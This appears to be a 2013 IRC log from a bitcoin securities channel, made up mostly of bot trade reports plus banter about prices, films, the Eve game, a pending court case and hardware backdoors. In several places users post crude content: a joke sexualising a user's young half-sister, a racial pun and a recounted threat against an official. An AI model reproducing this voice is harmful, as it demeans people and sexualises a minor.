[BTCTC] [LABCOIN] 360 @ 0.00341 = 1.2276 BTC [-] Sep 12 06:17:32 [BTCTC] [LABCOIN] 200 @ 0.003405 = 0.681 BTC [-] Sep 12 06:17:34 [BTCTC] [LABCOIN] 157 @ 0.003404 = 0.5344 BTC [-] Sep 12 06:17:35 [BTCTC] [LABCOIN] 220 @ 0.0034 = 0.748 BTC [-] Sep 12 06:17:36 [BTCTC] [LABCOIN] 300 @ 0.0034 = 1.02 BTC [-] Sep 12 06:17:37 [BTCTC] [LABCOIN] 149 @ 0.0034 = 0.5066 BTC [-] Sep 12 06:17:38 [BTCTC] [LABCOIN] 2000 @ 0.003396 = 6.792 BTC [-] Sep 12 06:17:39 [BTCTC] [LABCOIN] 3341 @ 0.003395 = 11.3427 BTC [-] Sep 12 06:17:41 [BTCTC] [LABCOIN] 1000 @ 0.003393 = 3.393 BTC [-] Sep 12 06:17:42 [BTCTC] [LABCOIN] 2000 @ 0.003393 = 6.786 BTC [-] Sep 12 06:17:43 [BTCTC] [LABCOIN] 800 @ 0.00339 = 2.712 BTC [-] Sep 12 06:17:43 [BTCTC] [LABCOIN] 333 @ 0.003359 = 1.1185 BTC [-] Sep 12 06:17:44 [BTCTC] [LABCOIN] 1000 @ 0.003358 = 3.358 BTC [-] Sep 12 06:17:45 [BTCTC] [LABCOIN] 12 @ 0.003351 = 0.0402 BTC [-] Sep 12 06:17:46 [BTCTC] [LABCOIN] 37 @ 0.00335 = 0.124 BTC [-] Sep 12 06:17:47 [BTCTC] [LABCOIN] 777 @ 0.003337 = 2.5928 BTC [-] Sep 12 06:17:48 [BTCTC] [LABCOIN] 777 @ 0.003337 = 2.5928 BTC [-] Sep 12 06:17:49 [BTCTC] [LABCOIN] 24 @ 0.003336 = 0.0801 BTC [-] Sep 12 06:17:50 [BTCTC] [LABCOIN] 534 @ 0.003336 = 1.7814 BTC [-] Sep 12 06:17:51 [BTCTC] [LABCOIN] 53 @ 0.003335 = 0.1768 BTC [-] Sep 12 06:17:52 [BTCTC] [LABCOIN] 720 @ 0.003335 = 2.4012 BTC [-] Sep 12 06:17:52 [BTCTC] [LABCOIN] 1000 @ 0.003334 = 3.334 BTC [-] Sep 12 06:17:53 [BTCTC] [LABCOIN] 1589 @ 0.003331 = 5.293 BTC [-] Sep 12 06:17:54 [BTCTC] [LABCOIN] 1000 @ 0.003331 = 3.331 BTC [-] Sep 12 06:17:55 [BTCTC] [LABCOIN] 747 @ 0.00333 = 2.4875 BTC [-] Sep 12 06:17:56 [BTCTC] [LABCOIN] 1000 @ 0.00333 = 3.33 BTC [-] Sep 12 06:17:57 [BTCTC] [LABCOIN] 3000 @ 0.00333 = 9.99 BTC [-] Sep 12 06:17:58 [BTCTC] [LABCOIN] 22 @ 0.00333 = 0.0733 BTC [-] Sep 12 06:17:59 [BTCTC] [LABCOIN] 32 @ 0.003327 = 0.1065 BTC [-] Sep 12 06:18:00 [BTCTC] [LABCOIN] 97 @ 0.003326 = 0.3226 BTC [-] Sep 12 06:18:01 KRS1: you're still better off selling it Sep 12 06:18:01 [BTCTC] [LABCOIN] 100 @ 0.003323 = 0.3323 BTC [-] Sep 12 06:18:02 [BTCTC] [LABCOIN] 200 @ 0.003322 = 0.6644 BTC [-] Sep 12 06:18:03 [BTCTC] [LABCOIN] 100 @ 0.00332 = 0.332 BTC [-] Sep 12 06:18:03 [BTCTC] [LABCOIN] 585 @ 0.003316 = 1.9399 BTC [-] Sep 12 06:18:05 [BTCTC] [LABCOIN] 1034 @ 0.003315 = 3.4277 BTC [-] Sep 12 06:18:18 omg labcopocalypse Sep 12 06:18:18 rly.. Sep 12 06:18:23 [HAVELOCK] [XBOND] 11 @ 0.00117469 = 0.0129 BTC [-] Sep 12 06:18:27 what are people getting for them Sep 12 06:18:29 any links? Sep 12 06:18:40 [BTCTC] [LABCOIN] 49 @ 0.00334 = 0.1637 BTC [+] Sep 12 06:18:42 [BTCTC] [LABCOIN] 121 @ 0.003318 = 0.4015 BTC [-] Sep 12 06:18:43 [BTCTC] [LABCOIN] 240 @ 0.003316 = 0.7958 BTC [-] Sep 12 06:18:44 [BTCTC] [LABCOIN] 221 @ 0.003315 = 0.7326 BTC [-] Sep 12 06:18:46 [BTCTC] [LABCOIN] 500 @ 0.003314 = 1.657 BTC [-] Sep 12 06:18:47 [BTCTC] [LABCOIN] 33 @ 0.003311 = 0.1093 BTC [-] Sep 12 06:18:48 [BTCTC] [LABCOIN] 100 @ 0.00331 = 0.331 BTC [-] Sep 12 06:18:48 [BTCTC] [LABCOIN] 360 @ 0.003308 = 1.1909 BTC [-] Sep 12 06:18:49 [BTCTC] [LABCOIN] 376 @ 0.003307 = 1.2434 BTC [-] Sep 12 06:19:17 [MPEX] [S.MPOE] 6400 @ 0.00089216 = 5.7098 BTC [+] Sep 12 06:19:19 [HAVELOCK] [XBOND] 420 @ 0.0011747 = 0.4934 BTC [+] Sep 12 06:19:27 [MPEX] [S.MPOE] 5000 @ 0.00089216 = 4.4608 BTC [+] Sep 12 06:19:34 theres a bunch on ebay Sep 12 06:19:42 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [+] Sep 12 06:19:56 [BTCTC] [ASICMINER-PT] 1 @ 2.237 BTC [-] Sep 12 06:21:11 lol this cat is selling his for $10K wtf Sep 12 06:21:34 [BTCTC] [DMS.PURCHASE] 1 @ 0.012 BTC [+] Sep 12 06:22:28 [BTCTC] [DMS.SELLING] 1 @ 0.009632 BTC [+] Sep 12 06:23:13 [BTCTC] [DMS.PURCHASE] 1 @ 0.012 BTC [+] Sep 12 06:25:12 [BTCTC] [DMS.MINING] 1 @ 0.002531 BTC [-] Sep 12 06:25:14 [HAVELOCK] [CBTC] 69 @ 0.0005 = 0.0345 BTC [+] Sep 12 06:25:24 [BTCTC] [DMS.PURCHASE] 2 @ 0.012 = 0.024 BTC [+] Sep 12 06:25:29 (5s):57.54G (avg):58.10Gh/s Sep 12 06:25:37 @ 300 watts i think Sep 12 06:27:13 [BTCTC] [DMS.PURCHASE] 3 @ 0.012 = 0.036 BTC [+] Sep 12 06:29:11 [BTCTC] [DMS.MINING] 5 @ 0.002531 = 0.0127 BTC [-] Sep 12 06:29:20 [BTCTC] [DMS.PURCHASE] 4 @ 0.012 = 0.048 BTC [+] Sep 12 06:31:24 [BTCTC] [DMS.PURCHASE] 5 @ 0.012 = 0.06 BTC [+] Sep 12 06:33:13 [BTCTC] [DMS.PURCHASE] 6 @ 0.012 = 0.072 BTC [+] Sep 12 06:35:40 [BTCTC] [DMS.MINING] 15 @ 0.002531 = 0.038 BTC [-] Sep 12 06:35:52 [BTCTC] [DMS.PURCHASE] 7 @ 0.012 = 0.084 BTC [+] Sep 12 06:35:53 [BTCTC] [LABCOIN] 35 @ 0.003311 = 0.1159 BTC [+] Sep 12 06:36:08 [BTCTC] [LABCOIN] 41 @ 0.003311 = 0.1358 BTC [+] Sep 12 06:39:12 [BTCTC] [DMS.MINING] 7 @ 0.002532 = 0.0177 BTC [+] Sep 12 06:42:09 [BTCTC] [RSM] 6 @ 0.009361 = 0.0562 BTC [-] Sep 12 06:45:51 [BTCTC] [DMS.MINING] 30 @ 0.0026 = 0.078 BTC [+] Sep 12 06:45:54 [BTCTC] [DMS.MINING] 20 @ 0.002625 = 0.0525 BTC [+] Sep 12 06:45:59 [BTCTC] [DMS.MINING] 65 @ 0.002649 = 0.1722 BTC [+] Sep 12 06:47:39 theres a bunch on ebay << i don't think they're selling really Sep 12 06:47:39 [MPEX] [S.MPOE] 5400 @ 0.00089216 = 4.8177 BTC [+] Sep 12 06:47:40 [MPEX] [S.MPOE] 4500 @ 0.00089408 = 4.0234 BTC [+] Sep 12 06:47:47 market is quite thin contrary to what people think. Sep 12 06:52:07 [BTCTC] [DMS.SELLING] 50 @ 0.0094 = 0.47 BTC [-] Sep 12 06:56:15 mircea_popescu: may I please have a complimentary subscription to trilema? Sep 12 06:56:18 [BTCTC] [LABCOIN] 65 @ 0.003322 = 0.2159 BTC [+] Sep 12 06:56:30 uh Sep 12 06:57:03 there isn't such a thing even, Sep 12 06:57:23 Oh I thought I saw a free subscription offer..hmm..where'd that window go Sep 12 06:59:15 Where did that window go? Sep 12 06:59:50 "I can't pay my rent cause all my money spent." - People Mircea hates. Sep 12 07:00:07 [BTCTC] [BTC-GROWTH] 1 @ 0.09805 BTC [+] Sep 12 07:00:11 "Govrenment should gimme money since all mine spent" Sep 12 07:01:24 never hurts to ask Sep 12 07:01:25 there was an interesting study, where the poorest were actually spending more than the poorest-1 Sep 12 07:02:49 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1968 BTC [-] Sep 12 07:03:51 [BTCTC] [LABCOIN] 5 @ 0.003438 = 0.0172 BTC [+] Sep 12 07:03:55 [BTCTC] [LABCOIN] 10 @ 0.003439 = 0.0344 BTC [+] Sep 12 07:04:10 [BTCTC] [LABCOIN] 135 @ 0.003439 = 0.4643 BTC [+] Sep 12 07:04:26 [BTCTC] [BASIC-MINING] 1 @ 0.1315 BTC [-] Sep 12 07:05:04 https://bitcointalk.org/index.php?topic=126420.0 Sep 12 07:05:10 The Imbecilitarians Sep 12 07:05:21 that was unexpected Sep 12 07:08:31 [HAVELOCK] [CBTC] 2834 @ 0.0005 = 1.417 BTC [+] Sep 12 07:08:33 [HAVELOCK] [CBTC] 100 @ 0.0005 = 0.05 BTC [+] Sep 12 07:08:36 [HAVELOCK] [CBTC] 4000 @ 0.000508 = 2.032 BTC [+] Sep 12 07:08:38 [HAVELOCK] [CBTC] 10000 @ 0.00050999 = 5.0999 BTC [+] Sep 12 07:08:40 [HAVELOCK] [CBTC] 5000 @ 0.00051 = 2.55 BTC [+] Sep 12 07:08:42 [HAVELOCK] [CBTC] 3066 @ 0.00051999 = 1.5943 BTC [+] Sep 12 07:08:45 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.0006325 = 0.0095 BTC [+] Sep 12 07:09:40 you're actually receiving praise for this article. it must be wrong Sep 12 07:10:37 [BTCTC] [TAT.VIRTUALMINE] 79 @ 0.0006335 = 0.05 BTC [+] Sep 12 07:12:10 lol@michael moore +1 Sep 12 07:12:12 [HAVELOCK] [CBTC] 195 @ 0.00051999 = 0.1014 BTC [+] Sep 12 07:15:18 [BTCTC] [TAT.ASICMINER] 15 @ 0.02172 = 0.3258 BTC [+] Sep 12 07:19:07 moo? Sep 12 07:22:45 [HAVELOCK] [AM1] 3 @ 2.27 = 6.81 BTC [-] Sep 12 07:22:53 [HAVELOCK] [AM1] 4 @ 2.29 = 9.16 BTC [+] Sep 12 07:23:07 [HAVELOCK] [AM1] 1 @ 2.29 BTC [+] Sep 12 07:25:52 pankkake notice guy got scammertagged for it. Sep 12 07:27:13 http://www.youtube.com/watch?v=aP3gzee1cps Sep 12 07:27:15 Cat gets caught barking by a human and resumes meowing - YouTube Sep 12 07:28:05 fkn cats Sep 12 07:29:13 that's a good article Sep 12 07:29:31 ;;seen jurov Sep 12 07:29:31 jurov was last seen in #bitcoin-assets 7 hours, 15 minutes, and 10 seconds ago: there is unsystem...but i guess it's not exactly what you want :) Sep 12 07:29:56 ;;later tell jurov could you message me some times you'll be around in the next 24 to discuss my coinbr account. kthx Sep 12 07:29:57 The operation succeeded. Sep 12 07:32:24 ;;ticker --market all Sep 12 07:32:29 MtGox BTCUSD last: 140.60010, vol: 41954.69366840 | Bitstamp BTCUSD last: 127.75, vol: 21639.66562611 | BTC-E BTCUSD last: 123.99, vol: 7498.72566 | Bitfinex BTCUSD last: 127.17, vol: 3962.19448141 | CampBX BTCUSD last: 128.96, vol: 1226.78372691 | Volume-weighted last average: 134.437196373 Sep 12 07:34:07 I don't pop molly I rock tom ford Sep 12 07:35:28 jay z is a no talent asshat. Sep 12 07:37:44 big call Sep 12 07:39:28 lol KRS1 is a rap genius Sep 12 07:39:52 lol Sep 12 07:41:19 I'ma show up to mircea_popescu conference dressed in a Tom Ford suit. Sep 12 07:41:24 And he's gonna send me home. Sep 12 07:41:31 "Back to murica whichoo" he'll exclaim Sep 12 07:42:02 im not good enough to tell suit brands by lookin Sep 12 07:43:32 "BlockChains, you are ignoring the whole reason we need a flashy looking website which is to attract large amounts of preorders!" let's scam with our scam! Sep 12 07:44:06 haha Sep 12 07:46:09 http://trilema.com/2013/hard-eight/ Sep 12 07:46:18 People like to believe Idiocracy is a movie laying bare the stupidity of contemporary America, at its core and in its outskirts. It’s a convenient commonplace, but it isn’t factual, not really - Idiocracy is merely a tedious, didacticist agglomeration of nonsense. Sep 12 07:46:18 Hard Eight on the other hand is exactly that : a movie laying bare the stupidity of contemporary America. Sep 12 07:49:52 oh your Idiocracy article is in that barbaric language Sep 12 07:53:22 sadly. Sep 12 07:53:31 [MPEX] [S.MPOE] 3600 @ 0.00089408 = 3.2187 BTC [+] Sep 12 07:54:31 is idiocracy really didactic? Sep 12 07:54:38 That's like calling South Park didactic imo Sep 12 07:54:42 or Beavis and Butthead Sep 12 07:56:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.02145 = 0.0429 BTC [-] Sep 12 07:57:04 [BTCTC] [BTC-BOND] 650 @ 0.01 = 6.5 BTC [+] Sep 12 08:01:20 Again? Lots of BTC-BOND purchases lately. Sep 12 08:04:22 [BTCTC] [RSM] 1 @ 0.009361 BTC [-] Sep 12 08:04:26 is that bad? Sep 12 08:04:39 [BTCTC] [DMS.SELLING] 27 @ 0.009632 = 0.2601 BTC [+] Sep 12 08:05:37 [MPEX] [S.MPOE] 2624 @ 0.00089111 = 2.3383 BTC [-] Sep 12 08:05:59 [BTCTC] [RSM] 5 @ 0.008171 = 0.0409 BTC [-] Sep 12 08:06:50 <^Howard^> Hello everyone Sep 12 08:07:04 good morning howard Sep 12 08:07:06 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1967 BTC [-] Sep 12 08:07:13 <^Howard^> I Good day JMPz :) Sep 12 08:07:21 <^Howard^> -I Sep 12 08:07:39 good day to you too Sep 12 08:07:42 guten tag Sep 12 08:07:52 <^Howard^> I wanted to ask what a Buttcoin is cause i wanted to trade Buttcoin for BTC? Can someone tell me? Sep 12 08:07:58 <^Howard^> Danke, dir auch :) Sep 12 08:08:01 lol Sep 12 08:08:16 Howard, I think you have been trolled Sep 12 08:08:23 [BTCTC] [LABCOIN] 1 @ 0.003347 BTC [-] Sep 12 08:08:40 [BTCTC] [LABCOIN] 5 @ 0.003347 = 0.0167 BTC [-] Sep 12 08:08:50 http://trilema.com/2013/they-really-are-buttcoins-nao/ Sep 12 08:08:53 you've fallen foul of a devious trick Sep 12 08:08:55 <^Howard^> Well iam desperate Sep 12 08:09:58 [HAVELOCK] [CFIG] 1 @ 0.149 BTC [-] Sep 12 08:11:30 <^Howard^> I have heard its more reliable than lending which i dont have success with it seems, even in an emergeny situation Sep 12 08:13:10 sexy pics of your sister for btc could work Sep 12 08:13:22 [BTCTC] [COGNITIVE] 6 @ 0.2802 = 1.6812 BTC [-] Sep 12 08:14:02 [BTCTC] [COGNITIVE] 5 @ 0.2802 = 1.401 BTC [-] Sep 12 08:14:04 <^Howard^> would be a bit young, she is only my half sister Sep 12 08:14:13 [BTCTC] [COGNITIVE] 1 @ 0.2802 BTC [-] Sep 12 08:14:32 all the better! Sep 12 08:15:22 <^Howard^> i knew you would have said that Sep 12 08:16:54 ;;google interrobang Sep 12 08:16:54 Interrobang - Wikipedia, the free encyclopedia: ; The Interrobang - It's the questions that matter: ; Interrobang - Merriam-Webster Online: Sep 12 08:17:17 i'm designing a poster for a band and they mentioned that they really like interrobangs Sep 12 08:17:30 ‽ Sep 12 08:17:46 yeh Sep 12 08:17:48 funny thing Sep 12 08:17:56 I even have a mapping for interrobangs on my keyboard :) Sep 12 08:18:23 oooo Sep 12 08:18:43 so i made a repeating background out of bombs with interrobangs on them Sep 12 08:18:54 bombs? terrorist Sep 12 08:19:40 [HAVELOCK] [SDSTM] 7 @ 0.00289 = 0.0202 BTC [+] Sep 12 08:21:01 shh Sep 12 08:21:01 http://tinyurl.com/2hq4k Sep 12 08:21:06 i'm up for parole soon Sep 12 08:22:20 nubbins`: It's cool I'm still waiting to go to trial Sep 12 08:24:36 http://imgur.com/QLlzSKb Sep 12 08:24:42 interrobang bombs Sep 12 08:24:57 [HAVELOCK] [CBTC] 1 @ 0.000519 BTC [-] Sep 12 08:27:40 Disorderly conduct is such a bullshit charge. It's like commiting people to psych wards because they don't, but might have schizophrenia in the future. Sep 12 08:28:16 maybe you'll get house arrest Sep 12 08:28:20 It isn't a bad thing. Still, lower market cap than just about everything else. Sep 12 08:28:26 i have a friend on house arrest, it seems great Sep 12 08:28:31 he gets to go to the gym and shit Sep 12 08:28:36 works at a strip club Sep 12 08:30:41 nubbins`: It's sounding like the lawyer is going to try to get me into "alcohol classes" but I already know how to drink... Sep 12 08:31:31 lel Sep 12 08:31:39 my friend is not allowed to drink for the next 4 years Sep 12 08:31:42 [MPEX] [S.MPOE] 900 @ 0.00088963 = 0.8007 BTC [-] Sep 12 08:32:19 madness Sep 12 08:33:09 If they suggest that I might was well pay the fine or just sit my ass in jail that month. Sep 12 08:33:47 Except that month happens to be october and I'd like to see the Cardinals win a world series while I drink lots of beer. Sep 12 08:34:11 if a fine is an option, sure Sep 12 08:34:39 his charges were mildly more serious, so it was more of a toss-up between sober house arrest and jail Sep 12 08:35:03 nubbins`: Well the offense allegedly involved someone who is allegedly a local elected public official albeit an unpopular one. Sep 12 08:35:19 thestringpuller soutpark definitely has that streak in it. Sep 12 08:35:51 sounds like you called someone a bad name Sep 12 08:36:31 nubbins`: Allegedly as I am told "A cock sucking motherfucker this county is going to regret" Sep 12 08:36:33 mircea_popescu: south park is parody by nature, not really as didactic as a satire of the same tone would be Sep 12 08:36:34 BingoBoingo moreover, the presumption of orderly conduct. wtf. Sep 12 08:36:51 thestringpuller: nah, south park dabbles in didacticism Sep 12 08:37:00 you could say the same for beavis and butthead Sep 12 08:37:03 thestringpuller it's there tho. they parody with a view to correct. Sep 12 08:37:14 mircea_popescu: That's what I'm talking about. Hauling my ass into jail for a speech crime . Sep 12 08:37:17 now, it's definitely not the only thing about that show, and uit's definitely not on a bothersome level Sep 12 08:37:20 but it is there. Sep 12 08:37:37 yeah Sep 12 08:37:42 beavis and butthead's commentary on genration x on all fronts could be viewed the same way Sep 12 08:37:43 BingoBoingo you should have stuck to playing eve. Sep 12 08:37:50 like the crack baby athletic association Sep 12 08:37:57 thestringpuller not really, they had no intent to redeem generation x. Sep 12 08:38:11 [MPEX] [S.MPOE] 3450 @ 0.00088963 = 3.0692 BTC [-] Sep 12 08:38:21 i think south park comes to the same conclusions though, take a look at the hot topic episode from 2008 Sep 12 08:38:45 all the kids are pretending to be vampires, because of hot topic, so the goth kids burn it down Sep 12 08:38:55 mircea_popescu: Well this was before eve. Just trial got delayed because the first judge liked shooting up the horse. I'll be back on eve when I have a fan and can play more than 12.4 minutes at a time. Sep 12 08:39:16 BingoBoingo im confounded they even do trials for misdemeanors now Sep 12 08:39:21 who has the time for that! Sep 12 08:39:30 whatcha do anyway, piss on a fence ? Sep 12 08:39:43 there is no "the moral of this story is don't read twilight it's bad" it's just commenting on the nature of kids in the same way beavis and butthead did Sep 12 08:39:45 no that's a sex crime right? Sep 12 08:40:18 pankkake only if women do it. Sep 12 08:40:25 99% sure pissing on fences is sex crime Sep 12 08:40:34 ffs. Sep 12 08:40:41 pissing on others, not so much Sep 12 08:40:44 obvious power play Sep 12 08:40:45 mircea_popescu: They do indeed. Picked up the best drive through lawyer I could find. Sep 12 08:40:48 is shitting on fences racist too ? Sep 12 08:41:04 BingoBoingo what happened to fine you 45 bux already. Sep 12 08:41:05 depends on who's shitting Sep 12 08:41:13 but shit ain't white... Sep 12 08:41:23 mircea_popescu: Allegedly made an ill advised phone call to lobby an elected official Sep 12 08:41:28 so it's deNIGRating the fence, if you get my drift. Sep 12 08:41:38 B0g4r7 B0g4r7_ b0n1 benkay bgupta BigBitz BingoBoingo BitOTTer913 bobbabad BTC0xygen BTCOxygen Bunnyh Sep 12 08:41:55 BingoBoingo isn't that completely within your god given right to threaten violence to elected officials ? Sep 12 08:42:49 and incidentally, is the word denigrate racist yet or they've not figured out the etymology yet ? Sep 12 08:42:51 ... Sep 12 08:42:54 mircea_popescu: I allegedly though allegedly doing such things were encouraged. Still worst cast I train cruiser to Level 5 and come back out to Eve as the baddest Sep 12 08:43:33 lol cruiser in teh can. Sep 12 08:43:45 BingoBoingo whadja allegedly say to him anyway ? Sep 12 08:44:49 Well allegegly I said they were a "cock sucking mother fucker" and that the mayor ought to kill him. To be fair though this is an area with long lasting tirbal plays for power. Sep 12 08:45:00 [HAVELOCK] [CBTC] 200 @ 0.000475 = 0.095 BTC [-] Sep 12 08:45:09 tribal plays Sep 12 08:45:10 wat Sep 12 08:45:21 [HAVELOCK] [CBTC] 1 @ 0.000475 BTC [-] Sep 12 08:45:35 train cruiser to level 45 and come out toeve as baddest Sep 12 08:45:45 what does it mean Sep 12 08:45:47 [HAVELOCK] [CBTC] 59 @ 0.000475 = 0.028 BTC [-] Sep 12 08:45:59 it's finance talk Sep 12 08:46:02 you wouldn't understand Sep 12 08:46:13 BingoBoingo you have, of course, solicited a jury trial. Sep 12 08:46:24 JMPz: This is Eve levels only go up to 45 Sep 12 08:46:35 JMPz http://trilema.com/2013/bitcoins-eve-corporation/ Sep 12 08:46:42 what is this is eve? Sep 12 08:46:48 what is this i dont eve Sep 12 08:47:03 so what do you do after level 45? Sep 12 08:47:08 i can't believe the idiots pumped the ferox further btw. Sep 12 08:47:14 it was the best in class to begin with. Sep 12 08:47:15 mircea_popescu: Actually a bench trial would be preferable. All of the judges are of the party opposing this officials, Local LEX apparently likes his cock though. Sep 12 08:47:26 game goes up to level 45 Sep 12 08:47:35 but you become level 46 basement-dweller Sep 12 08:47:36 [BTCTC] [TAT.ASICMINER] 28 @ 0.0211 = 0.5908 BTC [-] Sep 12 08:47:37 [BTCTC] [TAT.ASICMINER] 33 @ 0.02103 = 0.694 BTC [-] Sep 12 08:47:39 [BTCTC] [TAT.ASICMINER] 7 @ 0.02101 = 0.1471 BTC [-] Sep 12 08:47:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.021 = 0.042 BTC [-] Sep 12 08:47:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.021 BTC [-] Sep 12 08:47:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.02092 = 0.0628 BTC [-] Sep 12 08:47:43 [BTCTC] [TAT.ASICMINER] 11 @ 0.02091 = 0.23 BTC [-] Sep 12 08:47:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.02091 BTC [-] Sep 12 08:47:46 [BTCTC] [TAT.ASICMINER] 6 @ 0.02091 = 0.1255 BTC [-] Sep 12 08:47:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.02086 = 0.0626 BTC [-] Sep 12 08:47:59 BingoBoingo yeah but a jury trial is always an opportunity to embarass the fuck out of the op. Sep 12 08:48:10 a bench trial not so much. Sep 12 08:49:14 mircea_popescu: That it was. Maybe I'll set up an bot managed cue to train me well into caldari BC's. Dude's already been embarassed though as he got busted the next month for illegally appointing bitches and then later for wasting taxpayer dollars that should have went into the welfare-lotto cycle Sep 12 08:50:01 lol wasting dollars the wrong way. JAIL! Sep 12 08:51:46 welfare-lotto Sep 12 08:52:20 that really struck a chord with you guys, huh? Sep 12 08:53:14 it's a good name for it. Sep 12 08:53:49 [HAVELOCK] [AM100] 10 @ 0.02071 = 0.2071 BTC [-] Sep 12 08:53:50 mircea_popescu: Kinding of thinking of doing it for the hell of it. Write a texas secession novel, get pumped, and finally quit smoking. Sep 12 08:53:55 [HAVELOCK] [AM100] 1 @ 0.02070002 BTC [-] Sep 12 08:54:00 [HAVELOCK] [AM100] 6 @ 0.02070002 = 0.1242 BTC [-] Sep 12 08:54:03 [HAVELOCK] [AM100] 8 @ 0.02070002 = 0.1656 BTC [-] Sep 12 08:54:06 [HAVELOCK] [AM100] 1 @ 0.02070001 BTC [-] Sep 12 08:54:10 [HAVELOCK] [AM100] 8 @ 0.0206 = 0.1648 BTC [-] **** BEGIN LOGGING AT Thu Sep 12 21:46:19 2013 Sep 12 21:49:28 heavy is the head Sep 12 21:50:28 [BTCTC] [ACTIVEMINING] 1 @ 0.003009 BTC [+] Sep 12 21:50:33 soo, there's going to be some paranoid trashing of all netcards and installing new netcards on all mpex infrastructure. Sep 12 21:50:53 [BTCTC] [ACTIVEMINING] 4 @ 0.003008 = 0.012 BTC [-] Sep 12 21:50:58 downtime? Sep 12 21:51:01 there is no reason to believe anything was compromised. we just have no way to make sure wtf is in the chips because the vendor is being an asshole and won't release code. Sep 12 21:51:06 consequently everything is migrated. Sep 12 21:51:16 this will happen in 2 weeks, and should be less than half hour x2. Sep 12 21:51:20 mircea_popescu: good choice Sep 12 21:51:42 lol Sep 12 21:51:45 Cisco does that Sep 12 21:52:16 though I run my exchange on andriod using their prng with the undocumented intel prng drive over a baseband that is closed source. but hey, its linux! Sep 12 21:52:26 lol Sep 12 21:52:38 mircea_popescu: network card isn't the only thing in there with a ROM, you know. Sep 12 21:52:44 [BTCTC] [DMS.MINING] 5 @ 0.002689 = 0.0134 BTC [+] Sep 12 21:52:44 i do. Sep 12 21:53:00 yeah there is the bootloader but its only active on boot. guess you should unplug all cables when you reboot :P Sep 12 21:53:18 or did you already get a coreboot compatible system? Sep 12 21:53:29 god, NSA making our lives so anoying Sep 12 21:54:00 also mircea_popescu did you buy the cards from a shop or online. cause you know the NSA is known to backdoor shit at the manufacturer on tha targeted bases ;) Sep 12 21:54:04 good mindfuck for the uninitiated: modern HDDs have big fat EEPROMs. Sep 12 21:54:26 ethical eeproms. Sep 12 21:54:31 good mindfuck for the uninitiated: SSD's never delete ANYTHING, even when you think you've securely overwritten and deleted Sep 12 21:54:44 o nvm. Sep 12 21:54:56 gesell: entirely true. 'wear levelling.' Sep 12 21:55:20 [BTCTC] [LABCOIN] 2 @ 0.002998 = 0.006 BTC [+] Sep 12 21:55:20 gesell it depends exactly what you do with them at the low level but yes, by default they do. Sep 12 21:55:22 because they can't Sep 12 21:55:26 because they'd wear out. Sep 12 21:55:32 yup Sep 12 21:56:17 [HAVELOCK] [CFIG] 9 @ 0.149 = 1.341 BTC [-] Sep 12 21:56:21 wish i never got rid of my pentium server now Sep 12 21:56:23 [HAVELOCK] [CFIG] 1 @ 0.1499 BTC [+] Sep 12 21:56:41 mircea_popescu: Sep 12 21:56:43 .The C.E.O. has to be the virus,. Mr. Huang said. .To build a great company, you have to kill it a bit every day.. Sep 12 21:56:57 how true is that with MPEx? Sep 12 21:57:38 i dunno dood, ask the forum Sep 12 21:58:02 when a virus kills one cell it takes on more volume. so, in effect, mircea_popescu is tiranicle dictator Sep 12 21:58:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.02147 BTC [-] Sep 12 21:58:23 the barnicle tiranicle. Sep 12 21:58:35 he gets bigger and the other cells keep giving them their shit Sep 12 21:58:51 it's okay, the cells arent actually dead though Sep 12 21:58:52 they are reborn Sep 12 21:59:20 so you just got to look at the original analogy with a more religious mindset Sep 12 21:59:42 [BTCTC] [ACTIVEMINING] 259 @ 0.003084 = 0.7988 BTC [+] Sep 12 21:59:44 [BTCTC] [ACTIVEMINING] 241 @ 0.003085 = 0.7435 BTC [+] Sep 12 21:59:55 [BTCTC] [LABCOIN] 288 @ 0.002998 = 0.8634 BTC [+] Sep 12 21:59:56 [BTCTC] [LABCOIN] 1525 @ 0.003 = 4.575 BTC [+] Sep 12 22:00:18 [BTCTC] [TAT.MINIGAME] 10 @ 0.000249 = 0.0025 BTC [-] Sep 12 22:00:31 i was impressed yesterday to learn that the yahoo ceo uses pine for email Sep 12 22:00:34 f'ing hell Sep 12 22:00:50 [BTCTC] [TAT.MINIGAME] 20 @ 0.000249 = 0.005 BTC [-] Sep 12 22:01:03 i used pine for a while. it's actually much better than stuff likegmail. Sep 12 22:01:15 she still does Sep 12 22:01:21 pine is terrible Sep 12 22:01:21 she Sep 12 22:01:22 [BTCTC] [LABCOIN] 5 @ 0.002997 = 0.015 BTC [-] Sep 12 22:01:23 [BTCTC] [LABCOIN] 50 @ 0.00302 = 0.151 BTC [+] Sep 12 22:01:24 [BTCTC] [LABCOIN] 454 @ 0.003033 = 1.377 BTC [+] Sep 12 22:01:25 [BTCTC] [LABCOIN] 300 @ 0.003055 = 0.9165 BTC [+] Sep 12 22:01:25 [BTCTC] [LABCOIN] 605 @ 0.003076 = 1.861 BTC [+] Sep 12 22:01:26 mutt4lyfe Sep 12 22:01:26 [BTCTC] [LABCOIN] 1461 @ 0.003081 = 4.5013 BTC [+] Sep 12 22:01:39 yah, mutt++ Sep 12 22:01:48 mutt have vi bindings? Sep 12 22:01:59 ye Sep 12 22:02:04 [BTCTC] [TAT.MINIGAME] 8 @ 0.000249 = 0.002 BTC [-] Sep 12 22:02:13 mutt is only if you have direct access to your mail server :( Sep 12 22:02:17 [BTCTC] [LABCOIN] 100 @ 0.00309 = 0.309 BTC [+] Sep 12 22:02:18 [BTCTC] [LABCOIN] 520 @ 0.003098 = 1.611 BTC [+] Sep 12 22:02:19 [BTCTC] [LABCOIN] 1500 @ 0.0031 = 4.65 BTC [+] Sep 12 22:02:29 i cant type in a console without it. get too many 'o's and 'a's and hjkl mixed up in the text Sep 12 22:02:32 [BTCTC] [LABCOIN] 85 @ 0.0031 = 0.2635 BTC [+] Sep 12 22:02:40 thestringpuller: fetchmail Sep 12 22:02:43 [BTCTC] [TAT.MINIGAME] 1 @ 0.000249 BTC [-] Sep 12 22:02:53 then what's the point if you use fetch mail? :P Sep 12 22:03:03 [BTCTC] [LABCOIN] 448 @ 0.003115 = 1.3955 BTC [+] Sep 12 22:03:04 